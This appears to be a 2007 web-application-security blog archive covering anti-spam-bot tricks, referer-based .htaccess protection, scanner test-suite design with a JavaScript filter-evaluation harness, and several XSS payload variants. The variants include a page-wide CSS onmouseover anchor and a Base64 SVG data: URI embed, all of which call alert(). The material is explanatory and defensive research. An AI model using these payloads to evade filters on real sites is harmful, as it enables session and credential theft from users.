<form method="post" action="check.php" onsubmit="return reverseNames(this)">
	<label for="emanresu">&#8238;emanresu&#8237;</label> <input type="text" id="emanresu" name="emanresu" />   <br />

You can find the running example: here.
While talking about obfuscation/crypto: since there are few parameters to obfuscate/encrypt, maybe a Vigenère algorithm would be nice...

Note that we do not use the 'username' string anywhere in the HTML page; if you want to display 'username', you can use the character &#8238; (the Unicode right-to-left override), which reverses the display of the following text.

Friday, March 23 2007

Prevent spam bots on a phpBB2

I have talked before about techniques to prevent spam bots from registering or posting somewhere. Even though I think a good solution for this is to create session IDs with JavaScript, I was a bit stuck with phpBB2 because of the template engine: I cannot easily write a JavaScript dynamically into the page.

So, the solution I used is simply a CAPTCHA-like token which is written into the page with JavaScript, such as:

document.write("<input type='hidden' name='persoCaptcha' value='" + generateStaticKeyWord() + "' />");

And then I had to check for this value in the PHP script.

Fairly simple, but it seems to work without lots of modifications to the phpBB2 forum... Here is a list of spam bots that I detected with this technique on a forum. Even if this technique works for now, I will have to use a better one (the value is static and visible in the page source, so a bot that evaluates JavaScript, or simply replays the value it saw once, gets through)...

Wednesday, March 14 2007

.htaccess for protecting content from thieves

This has really nothing to do with web application security, but a friend asked me how to protect a bunch of HTML files in a directory. He was looking for session-based solutions, but for this he would have to rename the HTML files to PHP or whatever and then implement the protection... pretty boring!
I suggested him a really easy and imperfect solution: checking the Referer when accessing the HTML files (this is the same kind of protection as image anti-hotlinking):

# .htaccess
# -------
RewriteEngine on
# never rewrite the error page itself, otherwise the rule below loops on it
RewriteCond %{REQUEST_URI} !^/fail\.html$
# block requests whose Referer is not from yoursite.com (an empty Referer,
# i.e. a direct visit, is blocked too)
RewriteCond %{HTTP_REFERER} !yoursite\.com/ [NC]
RewriteRule ^(.*)$ /fail.html [NC]

You can find an example here.

PS: this may not be a valid solution for lots of applications! The Referer is sent by the client, so anyone can forge it, and some browsers and proxies strip it, which locks out legitimate visitors.

Friday, March 9 2007

W3C provides insecurity?

The W3C announced yesterday that a new Working Group was created to work on the HTML language.
I don't know if you think the same way as me about this, but for me, the HTML language is such a pain in the ass for security. It allows too many things, modifications, ill-written HTML... With XHTML we have the opportunity to have a quite strict language, which is definitely better...

Please guys, when you are doing the new HTML think with security in mind, thanks.

Wednesday, February 28 2007

Firefox2 and the Weird JavaScript Events...

For almost a week, I've been working with zeno, wisec and others on JavaScript events and HTML tags: which event can be executed in which tag...
The testing is definitely not finished, but I was implementing a JavaScript unit-testing-based test bed to keep everybody from clicking on 8700 test cases * nb_browsers...

Anyway, the method I use is to fire a JavaScript event on the load of the document to verify whether it works (the information is gathered by the JSUnit framework).
So, the funny part in Firefox is that I can fire almost every event in every tag; you can find an example here where I do something like that:

<acronym onsubmit="alert('TEST')">test</acronym>

The equivalent Internet Explorer version can be found here (it works well... IE does nothing).

I didn't really take the time to think about this, but I'm sure something can come from this...

Edit: Wisec found that under Firefox you can also fire every event on non-existing tags such as:

<unex ondblclick="alert('TEST')">test</unex>

Friday, February 23 2007

CSS is amphetamine for your XSS Injection

Yesterday, on the #webappsec channel, heanol asked how to do an XSS injection in an anchor tag <a> without the style="expression(..)" referenced by RSnake in the XSS Cheat Sheet.
Then I proposed him to use the JavaScript event attribute onmouseover=""... Thinking about it, it's not really good because the victim has to put his mouse over this link, which can be very small etc.
My idea then is to use CSS to make this link take up the whole page: this is pretty basic but powerful!

<a href="the link" onmouseover="alert('XSS');" 
style="position:absolute;top:0px;width:100000px;height:1000px;z-index:99999;" >Link</a>


I'll try to post some other interesting CSS-based XSS injections...

Friday, February 16 2007

The return of the SVG XSS

Months ago, I talked about SVG files and the possibility of including JavaScript inside them. Yesterday, I read on Disenchant's blog that this needed XML injection: that's true.
But then, I started thinking about variants of this, and an embedded SVG encoded in Base64 seems to work.

The injected string should be something like this (the Base64 payload is simply an SVG document containing a <script> element that calls alert("XSS"), carried in a data: URI, so no XML injection is needed anymore):

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="  type="image/svg+xml" 
AllowScriptAccess="always" />


Edit:
You can also find it here now: XSS Cheat Sheet.

Thursday, February 15 2007

What are we looking for?

While reading the new post on Jungsonn's blog, I decided to explain my point of view here.

Well, the background is the news in the New York Times about Acunetix (a web apps scanner vendor):
70% of the websites scanned were found to contain high or medium vulnerabilities ..
I will not talk about the Joe Snyder declaration/bet, which is kind of... well, sad for him :/

So, I guess the point of the discussion, and maybe the misunderstanding between Acunetix, Joe Snyder, Jungsonn and many others, is the definition of basic words such as vulnerability.
First of all, I have to say that Jungsonn is right when he talks about the kind of vulnerabilities he focuses on: let's say, directly exploitable to generate some failure in the web app.
But the point is that a vulnerability is not only this; it may also be really soft! If somebody is able to disclose some information on your website, such as listing the files in a directory (directory listing) or reaching a sub-domain they should not be aware of... All of these are vulnerabilities because somebody can get some information from them, even if they are not directly exploitable like remote file inclusion, SQL injection etc.

And if I had to use a web apps scanner, I would really need this tool to report all of these things, because it should replace (for my company) the consultant team or the hiring of a security expert...


I really think this kind of discussion arises because we don't have a real taxonomy for these words and people think differently about security...
And of course I don't claim to have the truth, but at least that's my point of view...

Wednesday, February 7 2007

How you should design a test suite for Web Apps Scanners

If you have ever thought about using a web application scanner to test the security of your website, you certainly had to make a choice: which web apps scanner should I buy/use?

In this post, I will not tell you which is the better black-box tester for whatever kind of web application.

Web applications may be very different, the tools are different, and thus they may differ in efficiency... If you read this, you probably know that I am talking about scanners such as WebInspect, AppScan, Acunetix, Hailstorm, Pantera, Grabber... In the following sections, I will explain a main idea that should be used for testing such tools.

A test suite for these tools is a website, and this website typically contains vulnerabilities; you can see this kind of website from Watchfire and SPI, but also WebGoat, SiteGenerator and others. But none of these websites are realistic, and they do not consider that a vulnerability may exist in different instances: variants.
If you don't know what a variant is, check the XSS Cheat Sheet (RSnake) or the Attack Patterns (Sean Barnum). A variant is what the attacker uses to perform the exploit.
A simple example for XSS: let's say you protect your website against XSS by filtering the <script> tag. This is neither perfect nor good, because there are other ways to inject XSS strings (an onmouseover event handler, for instance).

Here comes the concept of Level of Defense. If you are a developer you think about filters; if you are an attacker you think about variants of a vulnerability and attack patterns. The level of defense of a website is the strength of its filters against a given vulnerability.

For SQL injection you can have multiple types of filters... Here is a possible list of levels for SQL injection:

  • Level 0: Show SQL errors / No input filtering
  • Level 1: Hide SQL errors / No input filtering
  • Level 2: Typecasting (integer, string etc.)
  • Level 3: Escaping input strings
  • Level 4: Restricted accounts...
  • ...


In the concept of level of defense, it's important to note that, depending on the type of vulnerability (weakness, failure...), either level n also performs what level n-1 does, or level n is simply stronger than level n-1 for the same variants (for instance, for a weak hash function the levels cannot include one another, but using SHA-1 instead of MD5 is a higher level of defense; today SHA-1 is broken as well, so that step would now be SHA-256).

A key point: when you implement a level of defense for a vulnerability, you must be sure that your implementation does the whole job for that type of filter. For example, if you escape HTML entities, you need to escape all of them ('&', '<', '>', ''' and '"'), not only '<' and '>' while leaving ' and " to the next LoD.

Why is the level of defense better than a simple system with vulnerabilities?

With the level of defense, you can calibrate a type of website that is close to yours; you can build a test suite with your own levels of defense and see how the tool detects the vulnerabilities as the LoD increases. It is also a good way to know the state of the art of the tools for detecting vulnerabilities...

The idea was developed to create a test suite in order to evaluate web apps scanners; in this test suite we can select the current type of vulnerability and its level of defense (how hard it is to break):

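As an added example (not code from this blog or from any of the scanners it names), here is a tiny level-of-defense harness for XSS in JavaScript. Each level is a filter a developer might deploy, from nothing to full output encoding; the variants are payloads in the spirit of the posts above (a plain <script> tag, a mixed-case and a nested one, the onmouseover anchor stretched over the page with CSS, and the SVG carried in a data: URI). The level names, the function names, the shortened Base64 body in the SVG variant and the "executes" oracle are all assumptions of this example: the oracle is a regex heuristic, not a browser, and the filters are deliberately naive so that the lattice of levels shows up.

```javascript
// Added example: a "level of defense" harness for XSS filters.
// Not code from the blog post; names, payloads and the oracle are constructed here.

const variants = {
  scriptTag:     '<script>alert("XSS")</script>',
  mixedCase:     '<ScRiPt>alert("XSS")</ScRiPt>',
  nestedTag:     '<scr<script>ipt>alert("XSS")</script>',
  // the onmouseover anchor stretched over the whole page with CSS
  anchorOverlay: '<a href="#" onmouseover="alert(\'XSS\')" ' +
                 'style="position:absolute;top:0;left:0;width:100000px;height:1000px;z-index:99999">Link</a>',
  // the embedded SVG in a data: URI (Base64 body shortened to "<svg></svg>", constructed)
  svgDataUri:    '<embed src="data:image/svg+xml;base64,PHN2Zz48L3N2Zz4=" type="image/svg+xml" />',
};

function stripScriptOnce(s) {
  // Level 1: remove the literal tags exactly once, case-sensitive
  return s.replace(/<script>/g, '').replace(/<\/script>/g, '');
}

function stripScriptFixpoint(s) {
  // Level 2: case-insensitive, tags with attributes, repeated until nothing changes
  let prev;
  do {
    prev = s;
    s = s.replace(/<\/?script[^>]*>/gi, '');
  } while (s !== prev);
  return s;
}

function dropEventHandlers(s) {
  // Level 3: level 2 plus removal of on*=... attributes
  return stripScriptFixpoint(s).replace(/\son[a-z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
}

function dropScriptUrls(s) {
  // Level 4: level 3 plus removal of src/href attributes carrying data: or javascript:
  return dropEventHandlers(s).replace(/\s(?:src|href)\s*=\s*(["']?)\s*(?:data|javascript):[^"'\s>]*\1/gi, '');
}

function escapeHtml(s) {
  // Level 5: output encoding, nothing is interpreted as markup any more
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

const levels = [
  { name: 'L0 no filtering',            apply: s => s },
  { name: 'L1 strip <script> once',     apply: stripScriptOnce },
  { name: 'L2 strip <script> fixpoint', apply: stripScriptFixpoint },
  { name: 'L3 L2 + drop on* handlers',  apply: dropEventHandlers },
  { name: 'L4 L3 + drop script URLs',   apply: dropScriptUrls },
  { name: 'L5 escape HTML entities',    apply: escapeHtml },
];

// Heuristic oracle: does something executable survive in the filtered output?
function executes(html) {
  return /<script\b/i.test(html)
      || /<[a-z][^>]*\son[a-z]+\s*=/i.test(html)
      || /<[a-z][^>]*\s(?:src|href)\s*=\s*["']?\s*(?:data|javascript):/i.test(html);
}

// Lowest level that neutralises the payload, or -1 if none does.
function levelOfDefense(payload) {
  return levels.findIndex(l => !executes(l.apply(payload)));
}

// The calibration matrix the post talks about: one row per variant.
function matrix() {
  const out = {};
  for (const [name, payload] of Object.entries(variants)) out[name] = levelOfDefense(payload);
  return out;
}

console.log(matrix());
```

Running it gives one number per variant: the plain tag dies at L1, the mixed-case and nested tags survive L1 (the nested one is reassembled by the single pass) and die at L2, the anchor survives until L3 and the data: URI until L4, so a scanner that only knows the <script> variant will report a site at L1 as fixed when it is not. In a real application the right answer is L5 (contextual output encoding) or an allowlist parser-based sanitizer, not the regex filters used here to illustrate the levels.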

Saturday, February 3 2007

pyIndex: File Indexer in Python

A couple of months ago, I had to build a source code search engine for the SAMATE Reference Dataset. The organization of our source code is not really common, but still, it is easy to understand and well organized.
I now release this tiny Python script in the beta section: pyIndex.

You should have all the information you need to use/adapt this script for your own purposes; it uses a MySQL database and MySQLdb to connect to it. The script only adds words or references to the database; the search itself is not implemented (but it's only a really simple SQL query...).

Wednesday, January 31 2007

How to prevent spammers bot?

There are many ways to prevent spam, from Bayesian (statistical) tests to the basic CAPTCHA... But we all know that image CAPTCHAs can be bypassed by OCR; even if it can be quite tough, there is some software and there are articles about it (example here).
Well, let's talk about 2 other ways:

1. JavaScript version

Assuming that robots do not interpret JavaScript (which is probably true for most bots), it would be nice to have a hidden field filled in by JavaScript. It's quite simple to write such a script:

// true only when the browser exposes the W3C DOM creation API
var W3CDOM = (typeof document.createElement === 'function');
var inputInserted = false;

function addInput(field) {
	if (!W3CDOM || inputInserted)
		return;
	// use the form the activated field belongs to, not blindly the first form of the page
	var form = (field && field.form) ? field.form : document.forms[0];
	// create the hidden input
	var hiddenInput = document.createElement('input');
	hiddenInput.type = "hidden";
	hiddenInput.name = "testBrowser";
	hiddenInput.value = "success";
	// now add the input to the DOM, so it is sent with the form
	form.appendChild(hiddenInput);
	inputInserted = true;
}

Then, on the server, you check that GET/POST('testBrowser') == 'success'. The input looks like this (onfocus as well as onclick, so a user who tabs into the field with the keyboard is not mistaken for a bot):

<input type="text" name="OneOfMyFields" onclick="addInput(this)" onfocus="addInput(this)" />

2. Script generated form

The idea is to create a form with one input that has several instances, let's say:

<input class='c1' type="text" name="login_1" value="" />
<input class='c2' type="text" name="login_2" value="" />
<input class='c3' type="text" name="login_3" value="" />

With your script, you choose a 'random' number from 1 to 3 and generate the matching CSS (hiding the inputs that were not chosen). The script stores the random number in a cookie/session/JavaScript and later checks the submission against it (a server-side session is the only one of the three the bot cannot read: a cookie or a JavaScript variable tells it which field is the real one).
If an input other than the chosen one is filled in, the submission should be an automated one...

These techniques are absolutely not perfect at all: for the first, the assumption is quite weak, I mean it's not too hard to build a bot that handles JavaScript/CSS/DOM etc.; and for the second, 3 inputs are not enough, you need at least 30 for a representative trust.

Wednesday, January 24 2007

CSS: 53 Tips

You are not an expert in CSS? Neither am I; I often have trouble with IE/Opera/FF compatibility...
Anyway, you can find here some 53 cool techniques for writing nice CSS.

Thursday, January 11 2007

What I want to do in early 2007.

Even if I'll be busy with papers and tests, I really would like to do different things:

  1. Grabber: adding encoding support for testing with different charsets (UTF-7/8/16 and the encodings of other languages)
  2. Create a JavaScript functional analyzer: I've been thinking about this for a while; I think it is a good way to detect XSS. I was thinking of using Stratego/XT for parsing/AST construction; but still, because it's JavaScript, it's really hard to parse everything.
  3. XSS handler: just for fun, I want to write a PHP function for preventing XSS (using the mbstring functions) and the same kind of thing in Python

Sunday, January 7 2007

iDumper: Embedded iPod Music Copy

One thing I really hate about the iPod is that the songs are pseudo-obfuscated in a hidden directory on the iPod. Therefore, with iTunes, we cannot copy the MP3s from the iPod to the iTunes library (at least under Windows)... This is really stupid!

Anyway, there are lots of tools that do that very well, but I decided to write one: an embedded one. The executable/script lives on your iPod, so you can copy your files anywhere :)

iDumper is available in my beta/ repository.

Wednesday, January 3 2007

Nice catch: XSS in Acrobat PDF

I've just read it on Stefan Esser's blog: Stefano Di Paola has disclosed an XSS hole in Acrobat PDF documents. To have a look at it you can go here: PDF and XSS under Google!

This vulnerability is really important; be careful when you open a PDF file...

All of these vulnerabilities in rich documents (Flash, MHTML, SVG, QuickTime movies, PDF, etc.) suggest a big lack of security when these formats are designed. Of course these are amazing documents and very useful, but with the so-called Web 2.0 (and maybe the next Web 3.0 with video broadcasting and much more) there are more and more holes.

What can we do? Think twice before creating web services with media documents?
That is not productive enough, and maybe a little lack of security is not really bad. Do we care if a couple of guys can steal some passwords...

I guess lots of people think like that; it is understandable, but truly not the right way.
